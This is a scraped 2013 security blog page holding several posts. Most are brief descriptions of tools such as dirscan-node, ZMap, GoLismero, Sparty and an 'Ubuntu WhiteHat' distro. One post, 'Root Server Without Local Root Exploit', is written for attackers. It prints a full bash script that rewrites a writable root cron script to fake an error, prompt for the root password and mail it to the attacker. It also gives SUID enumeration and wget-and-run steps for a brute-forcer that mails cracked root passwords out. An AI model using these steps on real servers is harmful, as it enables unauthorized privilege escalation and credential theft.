<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">follow same-origin redirects</span></li>
</ul>
<h1 style="background-image: none; border: 0px; font-size: 40px; font-weight: normal; line-height: 1; margin-bottom: 16px; margin-top: 0px; max-width: 700px; padding-left: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"><a href="http://santoshdudhade.blogspot.com/2013/08/dirscan-node-web-directory-scanning.html" name="TODO" style="outline: none;"></a>TODO</span></h1>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">To develop:</span></div>
<ul style="margin: 0px 20px 20px 0px; max-width: 62em; padding-left: 25px;">
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">autodetect extensions</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">404 identificator</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">html crawl</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">timming measurement</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">use cluster lib to take profit of the multicore</span></li>
</ul>
<div style="line-height: 1.25em; max-width: 64em;">
</div>
<h1 style="background-image: none; border: 0px; font-size: 40px; font-weight: normal; line-height: 1; margin-bottom: 16px; margin-top: 0px; max-width: 700px; padding-left: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"><a href="http://santoshdudhade.blogspot.com/2013/08/dirscan-node-web-directory-scanning.html" name="Thanks" style="outline: none;"></a>Thanks</span></h1>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">The wordlist is based on dirb's wordlist, with extra pentest successful words.</span></div>
<h1 style="background-image: none; border: 0px; font-size: 40px; font-weight: normal; line-height: 1; margin-bottom: 16px; margin-top: 0px; max-width: 700px; padding-left: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"><a href="http://santoshdudhade.blogspot.com/2013/08/dirscan-node-web-directory-scanning.html" name="Disclaimer" style="outline: none;"></a>Disclaimer</span></h1>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Warning, this tool can damage the remote site performance, use with caution.</span></div>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">This tool is only for:</span></div>
<ul style="margin: 0px 20px 20px 0px; max-width: 62em; padding-left: 25px;">
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">educational purposes</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">authorized pentests</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">self-audits for admins</span></li>
</ul>
<div style="line-height: 1.25em; max-width: 64em;">
</div>
<h1 style="background-image: none; border: 0px; font-size: 40px; font-weight: normal; line-height: 1; margin-bottom: 16px; margin-top: 0px; max-width: 700px; padding-left: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"><a href="http://santoshdudhade.blogspot.com/2013/08/dirscan-node-web-directory-scanning.html" name="Issues" style="outline: none;"></a>Issues</span></h1>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">If you get a "Error: connect EMFILE" must increase the opened files limit:</span></div>
<ol style="margin: 0px 20px 20px 0px; max-width: 62em; padding-left: 25px;">
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">ulimit -n 9000</span></li>
</ol>
<div>
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Source-</span></div>
<div>
<a href="https://code.google.com/p/dirscan-node/" style="outline: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;">https://code.google.com/p/dirscan-node/</span></span></a></div>
<div>
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Screenshot -</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7skfwZUzvtCiCN2tzRaorkhVCA_mOExvvOqgh3YKbRY0x6LARkVZfSubm5CoQaexaaLl1fr6nId-BdfB8DFKALjZzS3q-U4K5HTp0gTIbGUpiDC6C1OXS-ZCbqTtesmHjlpmnZ20GCYrx/s1600/dirscan.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; outline: none; text-decoration: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;"><img border="0" height="340" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7skfwZUzvtCiCN2tzRaorkhVCA_mOExvvOqgh3YKbRY0x6LARkVZfSubm5CoQaexaaLl1fr6nId-BdfB8DFKALjZzS3q-U4K5HTp0gTIbGUpiDC6C1OXS-ZCbqTtesmHjlpmnZ20GCYrx/s1600/dirscan.png" style="border: none; padding: 0px;" width="400" /></span></span></a></div>
</div>
</div>
Fahimhttp://www.blogger.com/profile/06549473576655561875noreply@blogger.com0tag:blogger.com,1999:blog-3265662506015756178.post-7858761491213111072013-09-02T14:06:00.001-07:002013-09-02T14:06:23.992-07:00Root Server Without Local Root Exploit<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">Many hackers find it difficult to find a local root exploit for rooting the server. So here is few methods you could try to gain root acess without using a local root exploit!</span></div>
<h2 style="font-family: Arial, Verdana; line-height: 19px;">
<span style="background-color: white;">1. Custom Cron Tab Scripts</span></h2>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">Cron Jobs are some Tasks that are set to be Executed at a specific time. If the Root user has created a Custom Script used by Cron, and we can Write on this File, we can send a “Fake” Error Message and the Root user will probably type in his password.</span></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">First, check out if there are any Cron Job Tasks:</span></div>
<pre style="font-size: 13px; line-height: 19px;"><span style="background-color: white;"> crontab -l </span></pre>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">If you see any Custom Script, we must Check out if we can Write on it.</span></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">Let’s say we got a Custom script here: <b>/bin/cronscript</b></span></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<strong style="background-color: white;">To check if we can Write a File, type:</strong></div>
<pre style="font-size: 13px; line-height: 19px;"><span style="background-color: white;"> stat /bin/cronscript </span><br />
<span style="background-color: white;">
</span><span style="background-color: white;"> (If you get something like: “-rwxrwxrwx” in the output, you can edit the File!) </span></pre>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">Let’s edit the file and send a <span style="text-decoration: underline;">Fake Error Message.</span></span></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;"><strong>Make a Copy </strong>of the Original Script to <b>/bin/cronscript.bak </b>:</span></div>
<pre style="font-size: 13px; line-height: 19px;"><span style="background-color: white;"> cp /bin/cronscript /bin/cronscript.bak </span></pre>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;"><strong>Edit the </strong><b>/bin/cronscript </b><strong>like this:</strong></span></div>
<pre style="font-size: 13px; line-height: 19px;"><span style="background-color: white;"> #!/bin/sh </span><br />
<span style="background-color: white;">
</span><span style="background-color: white;"> echo “An System Error Occured!” </span><br />
<span style="background-color: white;">
</span><span style="background-color: white;"> echo “” </span><br />
<span style="background-color: white;">
</span><span style="background-color: white;"> echo “Error Code: #131425″ </span><br />
<span style="background-color: white;">
</span><span style="background-color: white;"> echo “” </span><br />
<span style="background-color: white;">
</span><span style="background-color: white;"> echo “Update to get the Latest Patch for this Security Issue.” </span><br />
<span style="background-color: white;">
</span><span style="background-color: white;"> read -s -p “[sudo] password for root ” rootpasswd </span><br />
<span style="background-color: white;">
</span><span style="background-color: white;"> echo “” </span><br />
<span style="background-color: white;">
</span><span style="background-color: white;"> echo “su: Authentication failure” </span><br />
<span style="background-color: white;">
</span><span style="background-color: white;"> echo “” </span><br />
<span style="background-color: white;">
</span><span style="background-color: white;"> sudo apt-get update && sudo apt-get upgrade </span><br />
<span style="background-color: white;">
</span><span style="background-color: white;"> sudo echo “The Password is: $rootpasswd” > .kod </span><br />
<span style="background-color: white;">
</span><span style="background-color: white;"> mail -s “Root’s Password” “ <span style="text-decoration: underline;"> email@address.com </span> ” < .kod </span><br />
<span style="background-color: white;">
</span><span style="background-color: white;"> rm .kod </span><br />
<span style="background-color: white;">
</span><span style="background-color: white;"> mv <span style="text-decoration: underline;"><b> cronscript.bak cronscript </b></span></span></pre>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">You should just Replace the <span style="text-decoration: underline;">Underlined</span> with your <strong>E-Mail and the Name of the Script!</strong></span></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">After you save the File, type: <b>chmod +x cronscript </b> <strong>to set it as Executable!</strong></span></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<strong style="background-color: white;">This script will:</strong></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">- Send a Fake Error Message</span></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">- Request for the Root’s Password</span></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">- Send to your E-Mail Address the Password <b>(make sure that there is the “ <strong>mail </strong>” command at the <strong>/bin </strong>)</b></span></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">- Restore the Original File</span></div>
<h2 style="font-family: Arial, Verdana; line-height: 19px;">
</h2>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">When the Script gets Executed, the Root User will Enter his Password and it will be send to you!</span></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<b style="background-color: white;">It would be better if you had some knowledge on Bash Programming…</b></div>
<h2 style="font-family: Arial, Verdana; line-height: 19px;">
<span style="background-color: white;">2. Enumerating all SUID Files</span></h2>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">An SUID File is any file that any User group has the Priviliges to Access, Read and Write on it.<br /><strong>What does this mean for you: </strong> You can Escalate Priviliges in this way, if it is in an Important Directory.<br />you can Social-Engineer a Privileged User.</span></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">To find all SUID Files, type:</span></div>
<pre style="font-size: 13px; line-height: 19px;"><b style="background-color: white;"> find / -user root -perm -4000 -print </b></pre>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">This will show all the SUID Files to your Terminal. <strong>Take your time and check them as they can help you to escalate Priviliges!</strong></span></div>
<h2 style="font-family: Arial, Verdana; line-height: 19px;">
<span style="background-color: white;">3. Brute Forcing</span></h2>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">I know what you are thinking after seeing the title, well this is different the tool we gonna use is called <b>Rootdabitch</b></span></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<b style="background-color: white;">What is so special in this?</b></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">The magic about this tool is that It works in background, so you can leave it working for days until you have results... when the password is cracked it will be mailed to you :)</span></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">For this, you need to have phpshell/ reverse shell / ssh access to the target to run this tool, You can get the tool here <a href="http://rootdabitch.googlecode.com/files/rootdabitch-0.1.zip" style="outline: none; text-decoration: none;"><b>Rootdabitch v0.1</b></a></span></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<b style="background-color: white;">Usage:</b></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
</div>
<pre style="font-size: 13px; line-height: 19px;"><span style="background-color: white;">./rootdabitch.sh youremail@site.com</span></pre>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
</div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<b style="background-color: white;">For kiddies:</b></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">First download rootdabitch to the server:</span></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
</div>
<pre style="font-size: 13px; line-height: 19px;"><span style="background-color: white;">wget http://rootdabitch.googlecode.com/files/rootdabitch-0.1.zip</span></pre>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
</div>
<span style="background-color: white; font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">Extract it by the following cmd:</span><br />
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
</div>
<pre style="font-size: 13px; line-height: 19px;"><span style="background-color: white;">unzip rootdabitch-0.1.zip</span></pre>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
</div>
<span style="background-color: white; font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">Chmod it to 755:</span><br />
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
</div>
<pre style="font-size: 13px; line-height: 19px;"><span style="background-color: white;">chmod + x rootdabitch.sh</span></pre>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
</div>
<span style="background-color: white; font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">Finally run the script</span><br />
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
</div>
<pre style="font-size: 13px; line-height: 19px;"><span style="background-color: white;">./rootdabitch.sh youremail@site.com</span></pre>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
</div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
</div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">Simply just chmod it and run the script. If the password is cracked you will have a mail containing the root password which will be in the file "passwords.txt" attached to the mail</span></div>
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">Thats all have a gr8 day :)</span></div>
</div>
Fahimhttp://www.blogger.com/profile/06549473576655561875noreply@blogger.com0tag:blogger.com,1999:blog-3265662506015756178.post-25817025022617607942013-09-02T13:45:00.004-07:002013-09-02T13:45:59.562-07:00Ubuntu WhiteHat edition<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghc_ditikw2RRqkIefFX-v7LN3mZJ_HoJXgZtkxyCUiRghdXBmqNg9aRGXx_MibdC8bs1Kq6OURpsbl_1kjvLDZ1IELjWtfICFejFxqxSECB2QIDBHC5vT6Hx00EtovtxLLRDT8r9-ool9/s1600/wh.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; outline: none;"><span style="background-color: white; color: black;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghc_ditikw2RRqkIefFX-v7LN3mZJ_HoJXgZtkxyCUiRghdXBmqNg9aRGXx_MibdC8bs1Kq6OURpsbl_1kjvLDZ1IELjWtfICFejFxqxSECB2QIDBHC5vT6Hx00EtovtxLLRDT8r9-ool9/s1600/wh.png" style="border: none; padding: 0px;" /></span></a></div>
<h1 class="title" style="-webkit-transition: background-color 0.2s ease, border 0.2s ease, color 0.2s ease, opacity 0.2s ease-in-out; border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 40px; font-weight: normal; line-height: 1.25; margin: 10px 0px 15px; outline: 0px; padding: 0px; transition: background-color 0.2s ease, border 0.2s ease, color 0.2s ease, opacity 0.2s ease-in-out; vertical-align: baseline;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"><span style="color: black;">Ubuntu WhiteHat edition</span></span></h1>
<ul style="border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; list-style-image: initial; list-style-position: initial; margin: 0px 0px 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<li style="border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Based on Ubuntu 12.10.</span></li>
<li style="border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">32-bit</span></li>
<li style="border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Kernel : 3.5.0-37-generic .</span></li>
<li style="border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Login/pass : root/toor</span></li>
<li style="border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">compat-wireless-3.6.8-1-snpc patched for injection and Handshake capture.</span></li>
</ul>
<div style="border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px 0px 20px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Distro is not based on Kali, all the main pentest tools are in /opt directory and the rest of the executables are located in /usr/bin This will make most of the scripts run smooth and easily customisable. OS is filled with the latest and best security tools available on the net.</span></div>
<span style="background-color: white;"><span style="font-family: Georgia, 'Times New Roman', serif; font-size: 13px; line-height: 20px;"><a href="http://n0where.net/ubuntu-whitehat-edition/" rel="bookmark" style="-webkit-transition: background-color 0.2s ease, border 0.2s ease, color 0.2s ease, opacity 0.2s ease-in-out; border: 0px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-decoration: none; transition: background-color 0.2s ease, border 0.2s ease, color 0.2s ease, opacity 0.2s ease-in-out; vertical-align: baseline;" title="Permalink to Ubuntu WhiteHat edition"></a><span style="line-height: 22px;"></span></span><br style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /></span>
<div style="border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Last but not least , The Pentest menu is full of training resources , pdfs , documentations, online courses , briefings and lots more.</span></div>
<div style="border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Download Link- <a href="https://docs.google.com/file/d/0B6CweuCfodlJLWxrVVFKN1BNSVU/edit?usp=sharing" style="outline: none;">https://docs.google.com/file/d/0B6CweuCfodlJLWxrVVFKN1BNSVU/edit?usp=sharing</a></span></div>
<div style="border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">LOGIN / PASS : root/toor</span></div>
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: 13px; line-height: 20px;">Source-<br /><a href="http://top-hat-sec.com/forum/index.php?topic=3441.0" style="outline: none;">http://top-hat-sec.com/forum/index.php?topic=3441.0</a></span></div>
Fahimhttp://www.blogger.com/profile/06549473576655561875noreply@blogger.com0tag:blogger.com,1999:blog-3265662506015756178.post-13480027202103021762013-09-02T13:45:00.002-07:002013-09-02T13:45:25.933-07:00ZMap v1.03 - Fast network scanner designed for Internet<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh714455oUE_naESwYWD7ocQK_sGYwjkrU6_JZqUuaL_9IRkXA_GIUpmbv4rI6PT8RDkGCEc-NkDW5I9bI8DWmbj7UITU5hjnxXiBFjV-1FkgRLx7mKnNHWc7u9A3wfCh4Xe6F1EbZ3ge0m/s1600/logo_test_transparent_monitor.png" imageanchor="1" style="background-color: white; margin-left: 1em; margin-right: 1em; outline: none;"><span style="color: black;"><img border="0" height="106" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh714455oUE_naESwYWD7ocQK_sGYwjkrU6_JZqUuaL_9IRkXA_GIUpmbv4rI6PT8RDkGCEc-NkDW5I9bI8DWmbj7UITU5hjnxXiBFjV-1FkgRLx7mKnNHWc7u9A3wfCh4Xe6F1EbZ3ge0m/s1600/logo_test_transparent_monitor.png" style="border: none; padding: 0px;" width="400" /></span></a></div>
<span style="background-color: white;"><span style="font-family: Georgia, 'Times New Roman', serif; font-size: 13px; line-height: 20px;">ZMap is a fast network scanner designed for Internet-wide network surveys. On a typical desktop computer with a gigabit Ethernet connection, ZMap is capable scanning the entire public IPv4 address space in under 45 minutes.<br /><br />While previous network tools have been designed to scan small network segments, ZMap is specifically architected to scan the entire address space. It is built in a modular manner in order to allow incorporation with other network survey tools. ZMap operates on GNU/Linux and supports TCP SYN and ICMP echo request scanning out of the box.<br /><br />Download - ZMap is a fast network scanner designed for Internet-wide network surveys. On a typical desktop computer with a gigabit Ethernet connection, ZMap is capable scanning the entire public IPv4 address space in under 45 minutes.<br /><br />While previous network tools have been designed to scan small network segments, ZMap is specifically architected to scan the entire address space. It is built in a modular manner in order to allow incorporation with other network survey tools. ZMap operates on GNU/Linux and supports TCP SYN and ICMP echo request scanning out of the box.<br /><br /><a href="https://zmap.io/download.html" style="outline: none;">Download Zmap</a> </span><br style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /><span style="font-family: Georgia, 'Times New Roman', serif; font-size: 13px; line-height: 20px;"><br /></span><span style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"></span><span style="font-family: Georgia, 'Times New Roman', serif; font-size: 13px; line-height: 20px;"><a href="https://zmap.io/documentation.html" style="outline: none;">Documentation</a></span></span><br />
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br />For more info:- <a href="https://zmap.io/" style="outline: none;">https://zmap.io</a></span></div>
</div>
Fahimhttp://www.blogger.com/profile/06549473576655561875noreply@blogger.com0tag:blogger.com,1999:blog-3265662506015756178.post-24717636911459247332013-09-02T13:44:00.004-07:002013-09-02T13:44:48.875-07:00GoLismero - The Web Knife Version 2.0 beta Released<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp89TbtZO3Trm9y3okO6PmrN1hHY2waOE4aahZ5grd-9UJ98g2fUAxm_C3YAm4pzDHuyWFTo7CswJSTMhQQ-ViXXFsBBsEv9OD2DnTZVkTYX5UoRYzcyvBGvXJ_2s0hea6cnulE_YVJmQE/s1600/0.png" imageanchor="1" style="background-color: white; margin-left: 1em; margin-right: 1em; outline: none;"><span style="color: black;"><img border="0" height="252" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp89TbtZO3Trm9y3okO6PmrN1hHY2waOE4aahZ5grd-9UJ98g2fUAxm_C3YAm4pzDHuyWFTo7CswJSTMhQQ-ViXXFsBBsEv9OD2DnTZVkTYX5UoRYzcyvBGvXJ_2s0hea6cnulE_YVJmQE/s1600/0.png" style="border: none; padding: 0px;" width="320" /></span></a></div>
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: 13px; line-height: 20px;">GoLismero is an Open Source security tools that can run their own security tests and manage a lot of well known security tools (OpenVas, Wfuzz, SQLMap, DNS recon, robot analyzer...) take their results, feedback to the rest of tools and merge all of results. And all of this automatically.<br /><br />GoLismero is a complete framework with a plugin system and integration with a lot of open source tools.<br /><br />Why use GoLismero?</span><br />
<ul style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin: 0px 20px 20px 0px; padding-left: 40px;">
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">There many reasons to use GoLismero 2.0. The most interesting features of the framework and why you would like to use it are:</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Is Open source</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Real platform independence. Tested on Windows, Linux, *BSD and OS X.</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">No native library dependencies. All of the framework has been written in pure Python.</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Good performance when compared with other frameworks written in Python and other scripting languages.</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Very easy to use.</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Plugin development is extremely simple.</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">The framework also collects and unifies the results of well known tools: sqlmap, xsser, openvas, dnsrecon, theharvester...</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Integration with standards: CWE, CVE and OWASP.</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Designed for cluster deployment in mind (not available yet).</span></li>
</ul>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<a href="http://golismero-project.com/downloads.aspx" style="outline: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;">Download from here</span></span></a></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Source-</span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<a href="http://golismero-project.com/" style="outline: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;">http://golismero-project.com/</span></span></a></div>
</div>
Fahimhttp://www.blogger.com/profile/06549473576655561875noreply@blogger.com0tag:blogger.com,1999:blog-3265662506015756178.post-53875665038267799242013-09-02T13:44:00.000-07:002013-09-02T13:44:14.662-07:00Sparty - MS Sharepoint and Frontpage Auditing Tool<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-family: Georgia, 'Times New Roman', serif;">Sparty is an open source tool written in python to audit web applications using sharepoint and frontpage architecture. The motivation behind this tool is to provide an easy and robust way to scrutinize the security configurations of sharepoint and frontpage based web applications. Due to the complex nature of these web administration software, it is required to have a simple and efficient tool that gathers information, check access permissions, dump critical information from default files and perform automated exploitation if security risks are identified. A number of automated scanners fall short of this and Sparty is a solution to that.</span></span><br />
<h3 style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 20px; font-weight: normal; line-height: 20px; margin-bottom: 16px;">
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Version 0.1 - Functionality !</span></h3>
<ul style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin: 0px 20px 20px 0px; padding-left: 40px;">
<li style="margin-bottom: 0.5em;"><span style="font-family: Georgia, 'Times New Roman', serif;">Sharepoint and Frontpage Version Detection!</span></li>
<li style="margin-bottom: 0.5em;"><span style="font-family: Georgia, 'Times New Roman', serif;">Dumping Password from Exposed Configuration Files!</span></li>
<li style="margin-bottom: 0.5em;"><span style="font-family: Georgia, 'Times New Roman', serif;">Exposed Sharepoint/Frontpage Services Scan!</span></li>
<li style="margin-bottom: 0.5em;"><span style="font-family: Georgia, 'Times New Roman', serif;">Exposed Directory Check!</span></li>
<li style="margin-bottom: 0.5em;"><span style="font-family: Georgia, 'Times New Roman', serif;">Installed File and Access Rights Check!</span></li>
<li style="margin-bottom: 0.5em;"><span style="font-family: Georgia, 'Times New Roman', serif;">RPC Service Querying!</span></li>
